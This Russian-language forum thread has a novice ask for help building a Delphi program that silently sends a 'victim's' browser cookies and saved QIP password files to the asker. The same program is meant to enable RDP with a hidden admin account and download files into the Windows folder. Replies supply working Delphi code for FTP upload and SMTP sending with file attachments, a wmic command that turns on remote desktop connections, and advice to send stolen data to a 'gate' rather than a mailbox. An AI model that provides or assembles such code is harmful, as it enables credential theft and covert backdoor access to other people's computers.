При нажатии на буттон выполнялись какие нибудь из определеных операций : 1) Отправка кук браузеров (опера\мазилла) на п\я 2) Файла QIP (при сохраненном пароле) тоже на п\я 3) Открыть порт 3389 с моим и установкой моего логина и пасса на новую скрытую учетку.. 4) Скачивание файла в определенное место, допусти c:\windows\ (c ftp) ..что из этого можно осуществить ? ..только давайте без флуда, только по сабжу пишите, а то за24бали уже безсмысленные сообщения.. \\в дельфине только учусь\\ \\ з.ы. если реал такое мутить, то приведите пример кода.. с меня +++
Осуществить можно все. 1) гугл - "делфи отправка данных на почту" -> первая ссылка - http://www.realcoding.net/article/view/6560 2) гугл - "делфи отправка данных на почту" -> первая ссылка - http://www.realcoding.net/article/view/6560 3) После "открыть порт 3389" не понял ничего... гугл - "делфи открыть порт 3389" -> открываем пару ссылок с первой страницы и находим http://msdn.microsoft.com/en-us/library/ms737550(VS.85).aspx 4) Используя логику и 3 предыдущих пункта попробуй угадать, что нужно сделать
Axeee, всетаки если ты только учишься, то ты рановато взялся за такие вещи. ну а теперь по теме: данные лучше всего слать на гейт как минимум. слать на мыло - это крайне убого. имхо
самое интересное то, что ниодного ответа по теме так и небыло ..это конешн опечально что народ такй пошел, лиж бы пофлудить.. M_script а ты кроме того как посылать к гуглу ничем не можешь больше помочь ? з.ы. ..про пункт 3 - я имел ввиду как сделать так, чтобы нажатием одной кнопки сделать из компьютера жертвы дедик, как будто запустил батник.. RedFern.89 это у меня метод оббучения такой) я придумываю какуюнибудь многофункциональную программу и начинаю её делать, попутно изучая новые компоненты и т.д. _DemiX_ у тебя самый позновательный ответ.. он даже по сабжу
Какие книги ты прочитал? Какой код сам написал? Покажи хоть что-нибудь, что ты сделал сам и тогда тебе помогут. А сейчас твой метод обучения называется попрошайничеством
А хотя, знаешь, я тебе пожалуй отвечу на поставленный вопрос. Ты ведь спрашивал возможно ли? Отвечаю: 1) Да 2) Да 3) Да 4) Да
Всё это на дельфи реализуемо,конечно. Правда вряд кто будет тут рассказывать какие библиотеки надо подключать и что надо на форму закидывать - искать самому придется. Вот тебе, для примера, функция которая умеет файл по FTP аплоадить - требует uses wininet; function upload_file(remote_server, directory, local_file, remote_file, user, pass: PAnsiChar): boolean; var hInet, hConnect: HINTERNET; Dir, Put: Boolean; begin hInet := InternetOpen(nil, INTERNET_OPEN_TYPE_DIRECT, nil, nil, 0); hConnect := InternetConnect(hInet, remote_server, INTERNET_DEFAULT_FTP_PORT, user, pass, INTERNET_SERVICE_FTP, INTERNET_FLAG_PASSIVE, 0); Dir := ftpSetCurrentDirectory(hConnect, directory); WaitForSingleObject(Cardinal(Dir), infinite); Put := ftpPutFile(hConnect, local_file, remote_file, FTP_TRANSFER_TYPE_BINARY, 0); InternetCloseHandle(hInet); InternetCloseHandle(hConnect); Result:= Put; end; Прогляди библиотеку wininet, там есть фунции,которые позволяют даунлодить. Пункт 3 не очень понятен - тебе надо просто порт открыть(своим приложением), или включить RDP - это совершенно разные вещи. Вот пример для письма( на форму кинь idSMTP и idMessage) procedure TForm1.Button6Click(Sender: TObject); begin IdSMTP1.Port:=25; IdSMTP1.Host := 'smtp.yandex.ru'; IdSMTP1.Username:='ИМЯ ПОЛЬЗОВАТЕЛЯ ТУТ'; IdSMTP1.Password:='ПАРОЛЬ ТУТ'; IdMessage1.Subject:='UPDATED SITE...'; {тема сообщения} IdMessage1.Recipients.EMailAddresses:='АДРЕС ПОЛУЧАТЕЛЯ ТУТ'; IdMessage1.From.Address:='ПОЛНЫЙ АДРЕС ОТПРАВИТЕЛЯ'; IdMessage1.Body.Add('Position in catalog:'); try try IdSMTP1.Connect; IdSMTP1.Send(IdMessage1); except on E:Exception do {Обработка ошибки тут} end; finally if IdSMTP1.Connected then IdSMTP1.Disconnect; end; end; P.S. Реализация DELPHI 7 P.S.S Заходишь на американский форум, задаешь вопрос - получаешь ответ Заходишь на израильский форум,задаешь вопрос - выслушиваешь встречный вопрос Заходишь на русский форум,задаешь вопрос - и пол дня выслушиваешь какой ты .удак
Steam[777] единственный человек, который хоть то то по сабжу ответил.. а теперь подробнее.. а можешь подписать некоторые строки.. какая и то означает.. как сделал ты с кодом написанный нижу про отправку письма.. мне надо RDP включить.. а как эо реализовать в делфи даже не представляю ..а что касается кода про письмо хотел сказать.. это ты привел пример отправки письма.. а как сделать прикрепленные файлы с письмом ? ..чтобы можно было загружать этот файл из определенного места ?
юзать wininet для закачки файла и idsmtp для отправки почты вообще не интересно это даже программированием назвать нельзя если только не для интереса делаеш а тупо надо быстро сделать то тогда еще понятно $ какую альтернативу ? изучите немного http протокол что касается передачи файлов сокеты протокол общения с smtp и напишите все с нуля без компонентов получите намного больше удовольствия от процесса
Человек только начинает изучать - так что ему, сразу надо в ASM лезть? Придет время - научится - мало кто сказал ping как только родился RDP включаетcя либо правкой реестра( ключ не помню ), и работать это будет после перезагрузки, либо из командной строки можно wmic /node:"ИМЯ_КОМПЬЮТЕРА" path win32_terminalservicesetting where (__Class!="") call setallowtsconnections 1 Прикрепляется так,кажется (точно не помню) TIdAttachment.Create(IdMessage1.MessageParts, 'c:\Xxx.xxx'); А по примеру кода спрашивай что конкретно не понятно
Слушай, ТС, будь серьезным, если ты задал вопрос "что из этого можно осуществить ?", и тебе ответили, что именно можно осуществить из твоего списка, то не надо называть такое сообщение флудом. Просто научись задавать корректные вопросы.
Steam[777] это так выполняется программно пуск\выполнить + то что я напишу да ? я правильно понял ? ..а запуск самой командной строки будет виден тому, кто запустит программно это все ? ..прост надо сделать так, чтобы все без палева было еслиб хоть одно слово было по теме из ответа тех постов, то я бы ничего не говорил.
Нет,это после IdMessage1.Body.Add('Position in catalog:'); добавь. А вообще сначал без этой строчки сделай, это я уже по памяти писал. А тот код,который изначально - точно рабочий
Я не посылал к гуглу, а дал 3 ссылки по первым трем пунктам и показал, каким образом нашел эти ссылки. Все эти вопросы на форуме обсуждались неоднократно. Что сложного в использовании поиска по форуму? Ведь можно сначала почитать, попробовать воспользоваться огромным количеством примеров с этого и других форумов, а в случае каких-либо затруднений задать более конкретные вопросы.
ТС попрошайка, M_script хоть в гугол и послал, да ему не лень было первые ссылки скинуть. По задачам которые поставил ТС - хоть к сети и отностятся, да достаточно разнообразны. Если не полениться и по кусочкам код собрать который лежит на просторах инета, то не только сам сдеалешь, но и немног запомнишь, вот. Задачи тривиальны.
знаете, что забавно? Что даже если бы тут нашелся задрот, ответивший именно так, как просит того афтар темы, то есть с введением, пояснением, объяснением всех механизмов, примерами кодов и готовым исходником, то сам афтар обосрался бы, увидев стокамногабукаф и пошел бы создал еще одну аналогичную тему в ожидании чуда. Никак не найду, где тут карму минусовать